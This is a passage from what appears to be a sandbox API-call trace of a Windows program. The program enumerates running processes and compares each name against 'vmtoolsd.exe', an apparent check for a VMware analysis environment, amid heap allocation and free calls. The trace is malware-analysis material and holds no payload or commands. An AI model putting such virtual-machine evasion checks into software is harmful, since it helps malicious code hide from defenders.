szExeFile="csrss.exe")) returned 1 [0121.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0121.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd508 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0121.778] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd508 | out: hHeap=0x12c0000) returned 1 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0121.778] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0121.779] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300f50 [0121.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csrss.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300f50 | out: hHeap=0x12c0000) returned 1 [0121.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0121.780] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0121.782] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0121.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.783] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef10 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="winlogon.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0121.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.784] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0121.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0121.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0121.785] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec90 [0121.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0121.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0121.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5f8 [0121.786] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0121.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0121.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0121.787] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0121.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0121.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0121.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0121.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0121.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.788] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0121.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0121.788] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5f8 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec90 | out: hHeap=0x12c0000) returned 1 [0121.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="services.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0121.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0121.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.790] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0121.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0121.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0121.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0121.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0121.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0121.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0121.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0121.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0121.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0121.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0121.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0121.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0121.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0121.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0121.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0121.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0121.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0121.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0121.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300ce8 [0121.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsass.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ce8 | out: hHeap=0x12c0000) returned 1 [0121.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.795] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0121.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0121.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0121.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0121.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0121.798] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0121.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0121.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1301068 [0121.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0121.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1301068 | out: hHeap=0x12c0000) returned 1 [0121.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0121.799] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0121.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0121.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef10 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0121.802] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0121.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300dc8 [0121.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0121.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300dc8 | out: hHeap=0x12c0000) returned 1 [0121.803] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0121.803] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, 